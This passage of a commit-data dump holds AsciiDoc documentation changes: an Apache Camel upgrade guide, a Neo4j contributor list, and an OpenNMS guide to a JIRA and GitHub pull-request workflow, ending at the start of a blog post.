NULL,\n version BIGINT NOT NULL,\n constraint aggregation_completed_pk PRIMARY KEY (id)\n);\n----\n\n=== camel-lra-starter\n\nThe Spring Boot LRA starter component has changed its auto-configuration keys to be similar to using camel-lra with camel-main or camel-quarkus.\nChange the keys from `camel.service.lra` to `camel.lra`, e.g. `camel.service.lra.coordinator-url` to `camel.lra.coordinator-url`.\n\n=== Maven Archetypes\n\nThe `camel-archetype-java8` has been removed, as you can just use `camel-archetype-java` instead.\n\n=== Camel-Kafka\n\nFor a long time, the headerFilterStrategy was applied to the consumer and producer in an interchanged way. Have a look at the following issue for more information: https:\/\/issues.apache.org\/jira\/browse\/CAMEL-15121\n\n","old_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.3 to 3.4\n\n=== camel-test and JMX\n\nThe `camel-test` module no longer has dependency on `camel-management` out of the box.\nIn Camel JMX is optional and to use JMX then `camel-management` must be added as dependency.\n\nFor example to use JMX during testing you the following dependency as test scope:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-management<\/artifactId>\n <scope>test<\/scope>\n<\/dependency>\n----\n\n=== Health Check\n\nThe default health check implementation has been moved out of `camel-base` into `camel-health` as a separate module.\nThe health check has been refactored and there are some APIs and classes that has been changed.\nThe health check in `camel-consul` has been removed.\n\nThe old health check was not fully implemented and was only targeting Spring Boot.\nThe new system is more generic and supports all Camel runtimes.\n\nAn example is provided in `camel-example-main-health`.\n\n=== Template components\n\nThe template components which allows access to the current `Exchange` and `CamelContext` API\nfrom the context map available for templating has now been restricted to only the message body and headers.\n\nThis option can be enabled (`allowContextMapAll=true`) for full access to the current Exchange and CamelContext.\nDoing so impose a potential security risk as this opens access to the full power of CamelContext API.\n\nThis applies to the following templating components: camel-freemarker, camel-velocity, camel-mvel, camel-mustache,\ncamel-string-template, camel-chunk, camel-robotframework.\n\n=== Using custom language in RouteBuilder\n\nThe Java DSL `RouteBuilder` allows referring to a custom language as shown below:\n\n[source,java]\n----\nfrom(\"direct:start\")\n .filter(language(\"foo\", \"Bla bla bla\"))\n .to(\"mock:camel\");\n----\n\nThis functionality is seldom in use, as you would use the provided languages from Camel.\nIf using, then the `language` method now requires a static import as shown below:\n\n[source,java]\n----\nimport static org.apache.camel.builder.Builder.language;\n----\n\n=== camel-spring-boot\n\nThe `\/actuator\/camelroutes` HTTP endpoint has been removed from provided Spring Boot actuators in `camel-spring-boot`.\nThis actuator was becoming problematic to maintain during Spring Boot upgrades due to changes in Spring Boot.\n\n=== camel-servlet and camel-http-common\n\n`HttpRegistry` and `DefaultHttpRegistry` classes 
from camel-servlet are moved from camel-servlet into camel-http-common.\n`HttpRegistryProvider` is added and used in `DefaultHttpRegistry` instead of `CamelServlet`.\n\nThese changes had effects on camel-atmosphere-websocket and camel-servlet and also camel-resteasy.\nUsers of these components where they would have custom implemetations on `DefaultHttpRegistry` and using `CamelServlet` class should take this change into account.\n\n=== camel-sql\n\nThe `JdbcAggregationRepository` optimistic locking feature has been fixed to work on a distributed environment and every database.\nThere is a new `version` column that is required and must be added to the repository:\n\n[source,sql]\n----\nCREATE TABLE aggregation (\n id varchar(255) NOT NULL,\n exchange blob NOT NULL,\n version BIGINT NOT NULL,\n constraint aggregation_pk PRIMARY KEY (id)\n);\nCREATE TABLE aggregation_completed (\n id varchar(255) NOT NULL,\n exchange blob NOT NULL,\n version BIGINT NOT NULL,\n constraint aggregation_completed_pk PRIMARY KEY (id)\n);\n----\n\n=== Maven Archetypes\n\nThe `camel-archetype-java8` has been removed, as you can just use `camel-archetype-java` instead.\n\n=== Camel-Kafka\n\nFrom a lot of time, the headerFilterStrategy application in consumer and producer was done in an interchanged way. You need to have a look at the following issue for more information: https:\/\/issues.apache.org\/jira\/browse\/CAMEL-15121\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77305211e6b49cfe2ef4a852423b1652e496ffa3","subject":"Adding @AlexanderYastrebov","message":"Adding @AlexanderYastrebov\n\nWelcome @AlexanderYastrebov as a Neo4j contributor!","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"manual\/src\/main\/resources\/community\/contributors.asciidoc","new_file":"manual\/src\/main\/resources\/community\/contributors.asciidoc","new_contents":"[[contributors]]\nContributors\n============\n\nAs an Open Source Project, the Neo4j User community extends its warmest thanks to all the contributors who have signed the <<cla>> to date and are contributing to this collective effort.\n\n[options=\"header\"]\n|=======\n|name | GIThub ID\n|Johan Svensson | https:\/\/github.com\/johan-neo[johan-neo]\n|Emil Eifrem | https:\/\/github.com\/emileifrem[emileifrem]\n|Peter Neubauer | https:\/\/github.com\/peterneubauer[peterneubauer]\n|Mattias Persson | https:\/\/github.com\/tinwelint[tinwelint]\n|Tobias Lindaaker | https:\/\/github.com\/thobe[thobe]\n|Anders Nawroth | https:\/\/github.com\/nawroth[nawroth]\n|Andr\u00e9s Taylor |https:\/\/github.com\/systay[systay]\n|Jacob Hansson |https:\/\/github.com\/jakewins[jakewins]\n|Jim Webber |https:\/\/github.com\/jimwebber[jimwebber]\n|Josh Adell |https:\/\/github.com\/jadell[jadell]\n|Andreas Kollegger |https:\/\/github.com\/akollegger[akollegger]\n|Chris Gioran |https:\/\/github.com\/digitalstain[digitalstain]\n|Thomas Baum |https:\/\/github.com\/tbaum[tbaum]\n|Alistair Jones |https:\/\/github.com\/apcj[apcj]\n|Michael Hunger |https:\/\/github.com\/jexp[jexp]\n|Jesper Nilsson |https:\/\/github.com\/jespernilsson[jespernilsson]\n|Tom Sulston |https:\/\/github.com\/tomsulston[tomsulston]\n|David Montag |https:\/\/github.com\/dmontag[dmontag]\n|Marlon Richert |https:\/\/github.com\/marlonrichert[marlonrichert]\n|Hugo Josefson |https:\/\/github.com\/hugojosefson[hugojosefson]\n|Vivek Prahlad |https:\/\/github.com\/vivekprahlad[vivekprahlad]\n|Adriano Almeida 
|https:\/\/github.com\/adrianoalmeida7[adrianoalmeida7]\n|Benjamin Gehrels |https:\/\/github.com\/BGehrels[BGehrels]\n|Christopher Schmidt |https:\/\/github.com\/FaKod[FaKod]\n|Pascal Rehfeldt |https:\/\/github.com\/prehfeldt[prehfeldt]\n|Bj\u00f6rn S\u00f6derqvist |https:\/\/github.com\/cybear[cybear]\n|Abdul Azeez Shaik |https:\/\/github.com\/abdulazeezsk[abdulazeezsk]\n|James Thornton |https:\/\/github.com\/espeed[espeed]\n|Radhakrishna Kalyan |https:\/\/github.com\/nrkkalyan[nrkkalyan]\n|Michel van den Berg |https:\/\/github.com\/promontis[promontis]\n|Brandon McCauslin |https:\/\/github.com\/bm3780[bm3780]\n|Hendy Irawan |https:\/\/github.com\/ceefour[ceefour]\n|Luanne Misquitta |https:\/\/github.com\/luanne[luanne]\n|Jim Radford |https:\/\/github.com\/radford[radford]\n|Axel Morgner |https:\/\/github.com\/amorgner[amorgner]\n|Taylor Buley |https:\/\/github.com\/editor[editor]\n|Alex Smirnov |https:\/\/github.com\/alexsmirnov[alexsmirnov]\n|Johannes Mockenhaupt |https:\/\/github.com\/jotomo[jotomo]\n|Pablo Pareja Tobes |https:\/\/github.com\/pablopareja[pablopareja]\n|Bj\u00f6rn Granvik |https:\/\/github.com\/bjorngranvik[bjorngranvik]\n|Julian Simpson|https:\/\/github.com\/simpsonjulian[simpsonjulian]\n|Pablo Pareja Tobes |https:\/\/github.com\/pablopareja[pablopareja]\n|Rickard \u00d6berg |https:\/\/github.com\/rickardoberg[rickardoberg]\n|Stefan Armbruster |https:\/\/github.com\/sarmbruster[sarmbruster]\n|Stephan Hagemann |https:\/\/github.com\/shageman[shageman]\n|Linan Wang |https:\/\/github.com\/wangii[wangii]\n|Ian Robinson|https:\/\/github.com\/iansrobinson[iansrobinson]\n|Marko Rodriguez |https:\/\/github.com\/okram[okram]\n|Saikat Kanjilal |https:\/\/github.com\/skanjila[skanjila]\n|Craig Taverner |https:\/\/github.com\/craigtaverner[craigtaverner]\n|David Winslow |https:\/\/github.com\/dwins[dwins]\n|Patrick Fitzgerald |https:\/\/github.com\/paddydub[paddydub]\n|Stefan Berder |https:\/\/github.com\/hrbonz[hrbonz]\n|Michael Kanner |https:\/\/github.com\/SepiaGroup[SepiaGroup]\n|Lin Zhemin |https:\/\/github.com\/miaoski[miaoski]\n|Christophe Willemsen |https:\/\/github.com\/kwattro[kwattro]\n|Tony Liu |https:\/\/github.com\/kooyeed[kooyeed]\n|Michael Klishin |https:\/\/github.com\/michaelklishin[michaelklishin]\n|Wes Freeman |https:\/\/github.com\/wfreeman[wfreeman]\n|Chris Leishman |https:\/\/github.com\/chrisleishman[chrisleishman] \n|Brian Levine |https:\/\/github.com\/blevine[blevine]\n|Ben Day |https:\/\/github.com\/benday280412[benday280412]\n|Davide Savazzi |https:\/\/github.com\/svzdvd[svzdvd]\n|Nigel Small |https:\/\/github.com\/nigelsmall[nigelsmall]\n|Lasse Westh-Nielsen |https:\/\/github.com\/lassewesth[lassewesth]\n|Wujek Srujek |https:\/\/github.com\/wujek-srujek[wujek-srujek]\n|Alexander Yastrebov |https:\/\/github.com\/AlexanderYastrebov[AlexanderYastrebov]\n|=======\n\n","old_contents":"[[contributors]]\nContributors\n============\n\nAs an Open Source Project, the Neo4j User community extends its warmest thanks to all the contributors who have signed the <<cla>> to date and are contributing to this collective effort.\n\n[options=\"header\"]\n|=======\n|name | GIThub ID\n|Johan Svensson | https:\/\/github.com\/johan-neo[johan-neo]\n|Emil Eifrem | https:\/\/github.com\/emileifrem[emileifrem]\n|Peter Neubauer | https:\/\/github.com\/peterneubauer[peterneubauer]\n|Mattias Persson | https:\/\/github.com\/tinwelint[tinwelint]\n|Tobias Lindaaker | https:\/\/github.com\/thobe[thobe]\n|Anders Nawroth | https:\/\/github.com\/nawroth[nawroth]\n|Andr\u00e9s Taylor 
|https:\/\/github.com\/systay[systay]\n|Jacob Hansson |https:\/\/github.com\/jakewins[jakewins]\n|Jim Webber |https:\/\/github.com\/jimwebber[jimwebber]\n|Josh Adell |https:\/\/github.com\/jadell[jadell]\n|Andreas Kollegger |https:\/\/github.com\/akollegger[akollegger]\n|Chris Gioran |https:\/\/github.com\/digitalstain[digitalstain]\n|Thomas Baum |https:\/\/github.com\/tbaum[tbaum]\n|Alistair Jones |https:\/\/github.com\/apcj[apcj]\n|Michael Hunger |https:\/\/github.com\/jexp[jexp]\n|Jesper Nilsson |https:\/\/github.com\/jespernilsson[jespernilsson]\n|Tom Sulston |https:\/\/github.com\/tomsulston[tomsulston]\n|David Montag |https:\/\/github.com\/dmontag[dmontag]\n|Marlon Richert |https:\/\/github.com\/marlonrichert[marlonrichert]\n|Hugo Josefson |https:\/\/github.com\/hugojosefson[hugojosefson]\n|Vivek Prahlad |https:\/\/github.com\/vivekprahlad[vivekprahlad]\n|Adriano Almeida |https:\/\/github.com\/adrianoalmeida7[adrianoalmeida7]\n|Benjamin Gehrels |https:\/\/github.com\/BGehrels[BGehrels]\n|Christopher Schmidt |https:\/\/github.com\/FaKod[FaKod]\n|Pascal Rehfeldt |https:\/\/github.com\/prehfeldt[prehfeldt]\n|Bj\u00f6rn S\u00f6derqvist |https:\/\/github.com\/cybear[cybear]\n|Abdul Azeez Shaik |https:\/\/github.com\/abdulazeezsk[abdulazeezsk]\n|James Thornton |https:\/\/github.com\/espeed[espeed]\n|Radhakrishna Kalyan |https:\/\/github.com\/nrkkalyan[nrkkalyan]\n|Michel van den Berg |https:\/\/github.com\/promontis[promontis]\n|Brandon McCauslin |https:\/\/github.com\/bm3780[bm3780]\n|Hendy Irawan |https:\/\/github.com\/ceefour[ceefour]\n|Luanne Misquitta |https:\/\/github.com\/luanne[luanne]\n|Jim Radford |https:\/\/github.com\/radford[radford]\n|Axel Morgner |https:\/\/github.com\/amorgner[amorgner]\n|Taylor Buley |https:\/\/github.com\/editor[editor]\n|Alex Smirnov |https:\/\/github.com\/alexsmirnov[alexsmirnov]\n|Johannes Mockenhaupt |https:\/\/github.com\/jotomo[jotomo]\n|Pablo Pareja Tobes |https:\/\/github.com\/pablopareja[pablopareja]\n|Bj\u00f6rn Granvik |https:\/\/github.com\/bjorngranvik[bjorngranvik]\n|Julian Simpson|https:\/\/github.com\/simpsonjulian[simpsonjulian]\n|Pablo Pareja Tobes |https:\/\/github.com\/pablopareja[pablopareja]\n|Rickard \u00d6berg |https:\/\/github.com\/rickardoberg[rickardoberg]\n|Stefan Armbruster |https:\/\/github.com\/sarmbruster[sarmbruster]\n|Stephan Hagemann |https:\/\/github.com\/shageman[shageman]\n|Linan Wang |https:\/\/github.com\/wangii[wangii]\n|Ian Robinson|https:\/\/github.com\/iansrobinson[iansrobinson]\n|Marko Rodriguez |https:\/\/github.com\/okram[okram]\n|Saikat Kanjilal |https:\/\/github.com\/skanjila[skanjila]\n|Craig Taverner |https:\/\/github.com\/craigtaverner[craigtaverner]\n|David Winslow |https:\/\/github.com\/dwins[dwins]\n|Patrick Fitzgerald |https:\/\/github.com\/paddydub[paddydub]\n|Stefan Berder |https:\/\/github.com\/hrbonz[hrbonz]\n|Michael Kanner |https:\/\/github.com\/SepiaGroup[SepiaGroup]\n|Lin Zhemin |https:\/\/github.com\/miaoski[miaoski]\n|Christophe Willemsen |https:\/\/github.com\/kwattro[kwattro]\n|Tony Liu |https:\/\/github.com\/kooyeed[kooyeed]\n|Michael Klishin |https:\/\/github.com\/michaelklishin[michaelklishin]\n|Wes Freeman |https:\/\/github.com\/wfreeman[wfreeman]\n|Chris Leishman |https:\/\/github.com\/chrisleishman[chrisleishman] \n|Brian Levine |https:\/\/github.com\/blevine[blevine]\n|Ben Day |https:\/\/github.com\/benday280412[benday280412]\n|Davide Savazzi |https:\/\/github.com\/svzdvd[svzdvd]\n|Nigel Small |https:\/\/github.com\/nigelsmall[nigelsmall]\n|Lasse Westh-Nielsen 
|https:\/\/github.com\/lassewesth[lassewesth]\n|Wujek Srujek |https:\/\/github.com\/wujek-srujek[wujek-srujek]\n|=======\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64c3f297bbdde9cbbc2bcbce0b20cf3bda918cf3","subject":"Revert \"Fixed and enhanced\"","message":"Revert \"Fixed and enhanced\"\n","repos":"rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms","old_file":"opennms-doc\/guide-doc\/src\/asciidoc\/text\/git-workflow.adoc","new_file":"opennms-doc\/guide-doc\/src\/asciidoc\/text\/git-workflow.adoc","new_contents":"\n== Issues in JIRA and GitHub workflow\n\nChanges in the official documentation and code base are tracked by JIRA - the link:http:\/\/issues.opennms.org[issue tracker] of OpenNMS.\nThis is the main tool in the project to organize tasks and plan releases.\nWhen a new version of OpenNMS is released, all issues are reflected in the release notes.\n\nIt is required to have link:http:\/\/issues.opennms.org\/secure\/Signup!default.jspa[JIRA account] for creating and commenting issues and a link:https:\/\/github.com\/join[GitHub account] for giving your contribution as _Pull Request_.\n\nThe main workflow to add or fix something is defined as the following:\n\n. Create an issue in JIRA.\n The issue number is a unique identifier and is used as a reference, e.g. NMS-7214\n. link:https:\/\/help.github.com\/articles\/fork-a-repo[Fork] OpenNMS to your private GitHub repository\n. Create a feature branch from `develop` with the following name schema: `NMS-<number>-<Your-Issue-Headline>`\n. Add a link of your working branch to your JIRA issue and allow others to help\n. Create or fix documentation\n. When you've finished, send a _Pull Request_ of your changes to the OpenNMS repository\n. Add a review header in your _Pull Request_ comment message\n. Add a link with to the _Pull Request_ and ask for a review\n. 
If the review is worked in, the _Pull Request_ will be merged into the codebase and is now in the official release cycle.\n\n=== Example workflow creating documentation\n\nThe following example describes a workflow for creating new documentation for the _DnsMonitor_.\n\n * Everything starts with a JIRA issue\n\n[[guide-doc-gitflow-create-issue]]\n.Create or pick an issue\nimage::..\/images\/01_pick-issue.png[]\n\n * Fork the OpenNMS project in your GitHub repository.\n * Go to your GitHub account with your repositories and create a working branch from _develop_, which is the default so you don't have to change anything.\n * Create a working branch for the JIRA issue you want to work on with the given name schema:\n\n NMS-<number>-docs-<Subject-without-spaces>\n\nFor our example: `NMS-6634-docs-DnsMonitor`.\nThis name is used later in the _Pull Request_ and helps to identify and track changes driven by this issue.\nType in the name in the input field and GitHub creates the branch for you.\n\n.Create a working branch for the JIRA issue in your repository\nimage::..\/images\/02_create-branch-from-dev.png[]\n\n.Create a link in the JIRA issue to your working branch; it indicates somebody is working on it.\nimage::..\/images\/03_link-to-working-branch.png[]\n\nThere are two ways to work on the issue.\n\n * _Option 1_: Make a local copy and work on your local computer\n * _Option 2_: Edit all the files directly online in the GitHub web editor\n\n==== Work on your computer locally\n\nTo work on your local computer, link:http:\/\/git-scm.com[_git_] or the link:https:\/\/windows.github.com[_GitHub GUI_] is required.\nClone your repository to your local computer with\n\n git clone https:\/\/github.com\/<your-github-nick>\/opennms.git\n\nIt will download the repository with all the branches to your local system in the 'opennms' directory.\nBy default you are in the _develop_ branch of OpenNMS.\nYou can switch to your previously created working branch with the following command:\n\n git checkout -b NMS-6634-docs-DnsMonitor origin\/NMS-6634-docs-DnsMonitor\n\nYou can list all existing branches with\n\n git branch -r\n\nNow you have your working branch where you can start your contribution.\n\n.Create the documentation and save it!\nimage::..\/images\/04_your-contribution.png[]\n\nThe command `git status` shows you all changes.\nTo add your work to the version-controlled history you have to add your changes to a commit.\nIn our example we have created the 'DnsMonitor.adoc' file and it is shown as currently untracked in git.\n\nThe command\n\n git add DnsMonitor.adoc\n\nadds this file for the next commit.\n\nNOTE: The full path to the file to add depends on your current location in the file system.\n\n.Add your created or modified files with git add.\nimage::..\/images\/05_add-to-git.png[]\n\nWrite a comment which explains what you did.\nThe first line in the commit message is used as a subject line and should contain the JIRA issue number and the JIRA issue subject.\nAfter the subject keep one empty line; you can use bullet points to describe your changes.\n\n.Git comment with a subject line and bullet points for the description\nimage::..\/images\/06_git-comment.png[]\n
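For example, the commit could be created on the command line as follows (a hypothetical message for this issue, following the schema described above; the guide otherwise shows the message only in the screenshot):\n\n git commit -m \"NMS-6634: Add documentation for the DnsMonitor\"\n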
The commit with your change is now stored in the local history of your repository.\nWith the following command you can upload your changes to your GitHub repository.\n\n git push\n\n.Upload your changes to your GitHub repository\nimage::..\/images\/07_git-push.png[]\n\nNOTE: Uploading changes to your repository doesn't have any effect on the project.\n You can use it as your backup and to stage your working progress.\n It also allows others to help you in your current working branch.\n\nThe next step is sending your changes to the official OpenNMS repository described in section <<guidedoc-gitflow-send-pull-request>>.\n\n==== Work with the GitHub Web editor\n\nIt is possible to work completely in the GitHub editor.\n\nWARNING: Be careful if you don't have a reliable internet connection.\n You could lose your content in case of connection loss.\n\nYou can create a new file in your repository as follows:\n\n.Create a new file with the `+` in (1)\nimage::..\/images\/13_web-create-new-file.png[]\n\n.Set a file name and create content and a commit message\nimage::..\/images\/14_web_filename-content-commit.png[]\n\n. File name to create, in our case a new documentation file with the name 'DnsMonitor.adoc'\n. Documentation in _AsciiDoc_ format\n. Subject for the commit message with `NMS-<number>-docs-<Subject-without-spaces>`\n. Short information about your change\n\nYou can commit the change directly online by clicking on _Commit changes_ at the bottom end of the page.\n\nThe next step is sending your changes to the official OpenNMS repository described in section <<guidedoc-gitflow-send-pull-request>>.\n\n[[guidedoc-gitflow-send-pull-request]]\n==== Send the Pull Request\n\nIf you have finished, it's time to create a _Pull Request_ to indicate your contribution should go into the official OpenNMS codebase.\nCommit and push all your changes to your GitHub repository.\nCreate a _Pull Request_ from the GitHub web application with a click on _Compare & pull request_.\nThe _Pull Request_ will be created automatically against the correct _develop_ branch.\n\n.Click on _Compare & pull request_\nimage::..\/images\/08_compare-branches.png[]\n\nGitHub will use your last git commit message for the _Pull Request_.\nAdd to your commit message the following information:\n\n----\nJIRA: http:\/\/issues.opennms.org\/browse\/NMS-6634\n\nTodo Review:\n- [ ] Typo and grammar\n- [ ] Formatting and conventions\n- [ ] Content\n----\n\nThis comment creates a review status indicator for the review.\n\n.Create a review status indicator in your _Pull Request_ message\nimage::..\/images\/09_create-review-indicator.png[]\n\nTo indicate you need a review, set a link for the _Pull Request_ in the JIRA issue.\n\n.Create a link with a review request in the JIRA issue\nimage::..\/images\/10_doc-pull-request-issue.png[]\n\nReviewers can add annotation lines to your contributed changes.\nYou can work on these comments by just making your changes in your working branch and committing and pushing them to your repository.\nGitHub will automatically add these commits to your pull request.\nIf the status for _Content_, _Formatting and conventions_ and _Typo and grammar_ is finished, the _Pull Request_ will be merged into the official OpenNMS code base.\n\nNOTE: You will be notified if a reviewer adds comments or requests changes through GitHub.\n\nIf your _Pull Request_ is merged you will also be notified and the status of your outstanding _Pull Request_ changes to _Merged_ on your GitHub profile page.\n\n.Status of pull requests is indicated on your GitHub profile page\nimage::..\/images\/11_merged-pull-request.png[]\n\nThe OpenNMS Continuous Integration system based on _Bamboo_ picks up the merged pull request, starts a build and deploys a version with your changes automatically.\nYou can see the build jobs on the publicly available 
link:http:\/\/bamboo.internal.opennms.com:8085\/allPlans.action[Bamboo system].\n","old_contents":"\n== Issues in JIRA and GitHub workflow\n\nChanges in the official documentation and code base are tracked by JIRA - the link:http:\/\/issues.opennms.org[issue tracker] of OpenNMS.\nThis is the main tool in the project to organize tasks and plan releases.\nWhen a new version of OpenNMS is released, all issues are reflected in the release notes.\n\nIt is required to have link:http:\/\/issues.opennms.org\/secure\/Signup!default.jspa[JIRA account] for creating and commenting issues and a link:https:\/\/github.com\/join[GitHub account] for giving your contribution as _Pull Request_.\n\nThe main workflow to add or fix something is defined as the following:\n\n. Create an issue in JIRA.\n The issue number is a unique identifier and is used as a reference, e.g. NMS-7214\n. link:https:\/\/help.github.com\/articles\/fork-a-repo[Fork] OpenNMS to your private GitHub repository\n. Create a feature branch from `develop` with the following name schema: `NMS-<number>-<Your-Issue-Headline>`\n. Add a link of your working branch to your JIRA issue and allow others to help\n. Create or fix documentation\n. When you've finished, send a _Pull Request_ of your changes to the OpenNMS repository\n. Add a review header in your _Pull Request_ comment message\n. Add a link with to the _Pull Request_ and ask for a review\n. If the review is worked in, the _Pull Request_ will be merged into the codebase and is now in the official release cycle.\n\n=== Example workflow creating documentation\n\nThe following example describes a workflow how to create a new documentation for the _DnsMonitor_.\n\n * Everything starts with an JIRA issue\n\n[[guide-doc-gitflow-create-issue]]\n.Create or pick an issue\nimage::..\/images\/01_pick-issue.png[]\n\n * Fork the OpenNMS project in your GitHub repository.\n * Go to your GitHub account with your repositories and create working branch from _develop_, which is the default so you don't have to change anything.\n * Create a working branch for the JIRA issue you want to work on with the given name schema:\n\n NMS-<number>-docs-<Subject-without-spaces>\n\nFor our example: `NMS-6634-docs-DnsMonitor`.\nThis name is used later in the _Pull Request_ and helps to identify and track changes driven by this issue.\nType in the name in the input field and GitHub create the branch for you.\n\n.Create a working branch for the JIRA issue in your repository\nimage::..\/images\/02_create-branch-from-dev.png[]\n\n.Create a link in the JIRA issue to your working branch, it indicates somebody is working on it.\nimage::..\/images\/03_link-to-working-branch.png[]\n\nThere are two ways to work on the issue.\n\n * _Option 1_: Make a local copy and work on your local computer\n * _Option 2_: Edit directly all the files online in the GitHub web editor\n\n==== Work on your computer locally\n\nTo work on your local computer link:http:\/\/git-scm.com[_git_] or the link:https:\/\/windows.github.com[_GitHub GUI_] is required.\nClone your repository to you local computer with\n\n git clone https:\/\/github.com\/<your-github-nick>\/opennms.git\n\nIt will download the repository with all the branches to your local system in the 'opennms' directory.\nBy default you are in the _develop_ branch of OpenNMS.\nYou can switch to your previously created working branch with the following command:\n\n git checkout -b NMS-6634-docs-DnsMonitor origin\/NMS-6634-docs-DnsMonitor\n\nYou can show list all existing branches with\n\n git 
branch -r\n\nNow you have your working branch where you can start your contribution.\n\n.Create the documentation and save it!\nimage::..\/images\/04_your-contribution.png[]\n\nThe command `git status` gives you all changes.\nTo add your work to the version controlled history you have to add your changes to a commit.\nIn our example we have created the 'DnsMonitor.adoc' file and it is shown as currently untracked in git.\n\nThe command\n\n git add DnsMonitor.adoc\n\nadds this file for the next commit.\n\nNOTE: The full path to the file to add depends on your current location in the file system.\n\n.Add your created or modified files with git add.\nimage::..\/images\/05_add-to-git.png[]\n\nWrite a comment which explains what you did.\nThe first line in the commit message is used as a subject line and should contain the JIRA issue number and the JIRA issue subject.\nAfter the subject keep one empty line and you can use bullet points to describe your changes\n\n.Git comment with a subject line and bullet points for the description\nimage::..\/images\/06_git-comment.png[]\n\nThe commit with your change is now stored in the local history of your repository.\nWith the following command you can upload your changes to your GitHub repository.\n\n git push\n\n.Upload your changes to your GitHub repository\nimage::..\/images\/07_git-push.png[]\n\nNOTE: Upload changes to your repository doesn't have any effect on the project.\n You can use it as your backup and to stage your working progress.\n It also allows others to help you in your current working branch.\n\nThe next step is sending your changes to the official OpenNMS repository described in section <<guidedoc-gitflow-send-pull-request>>.\n\n==== Work with the GitHub Web editor\n\nIt is possible to work completely on the GitHub editor.\n\nWARNING: Be careful if you don't have a reliable internet connection.\n It could be possible you loose the content in case of connection loss.\n\nYou can create a new file your repository as following:\n\n.Create a new file with the `+` in (1)\nimage::..\/images\/13_web-create-new-file.png[]\n\n.Set a file name and create content and a commit message\nimage::..\/images\/14_web_filename-content-commit.png[]\n\n. File name to create in our case a new documentation file with the name 'DnsMonitor.adoc'\n. Documentation in _AsciiDoc_ format\n. Subject for the commit message with `NMS-<number>-docs-<Subject-without-spaces>`\n. 
Short information about your change\n\nYou can commit the change directly online by clicking on _Commit changes_ on the bottom end of the page.\n\nThe next step is sending your changes to the official OpenNMS repository described in section <<guidedoc-gitflow-send-pull-request>>.\n\n[[guidedoc-gitflow-send-pull-request]]\n==== Send the Pull Request\n\nIf you have finished, it's time to create a _Pull Request_ to indicate your contribution should go in the official OpenNMS codebase.\nCommit and push all your changes to your GitHub repository.\nCreate a _Pull Request_ from the GitHub web application with click on _Compare & pull request_.\nThe _Pull Request_ will be created automatically against the correct _develop_ branch.\n\n.Click on _Compare & pull request_\nimage::..\/images\/08_compare-branches.png[]\n\nGitHub will use your last git commit message for the _Pull Request_.\nAdd to your commit message the following information:\n\n----\nJIRA: http:\/\/issues.opennms.org\/browse\/NMS-6634\n\nTodo Review:\n- [ ] Typo and grammar\n- [ ] Formatting and conventions\n- [ ] Content\n----\n\nThis comment creates a review status indicator for the review.\n\n.Create a review status indicator in your _Pull Request_ message\nimage::..\/images\/09_create-review-indicator.png[]\n\nTo indicate you need a review set a link for the _Pull Request_ in the JIRA issue.\n\n.Create a link with a review request in the JIRA issue\nimage::..\/images\/10_doc-pull-request-issue.png[]\n\nReviewer can add annotations lines in your contributed changes.\nYou can work in this comments by just making your changes in your working branch, commit and push them to your repository.\nGitHub will automatically add this commits to your pull requests.\nIf the status for _Content_, _Formatting and conventions_ and _Typo and grammar_ is finished, the _Pull Request_ will be merged to the official OpenNMS code base.\n\nNOTE: You will be notified if a reviewer adds comments or request changes through the GitHub.\n\nIf your _Pull Request_ is merged you will be also notified and the status of your outstanding _Pull Request_ changes to status _Merged_ on your GitHub profile page.\n\n.Status of pull requests is indicated on your GitHub profile page\nimage::..\/images\/11_merged-pull-request.png[]\n\nThe OpenNMS Continuous Integration system based on _Bamboo_ picks up the merged pull request and starts a build and deploys a version with your changes automatically.\nYou can see the build jobs on the public available link:http:\/\/bamboo.internal.opennms.com:8085\/allPlans.action[Bamboo system].\n\nThis is my contribution to fix or enhance something.\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"0baa5aaf0446b8990404be45326bc28a68c3c41c","subject":"Update 2016-01-06-Introducing-the-New-bGC2-Site.adoc","message":"Update 2016-01-06-Introducing-the-New-bGC2-Site.adoc","repos":"duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse","old_file":"_posts\/2016-01-06-Introducing-the-New-bGC2-Site.adoc","new_file":"_posts\/2016-01-06-Introducing-the-New-bGC2-Site.adoc","new_contents":"= Introducing the New bGC(2) Site\n:hp-image: 
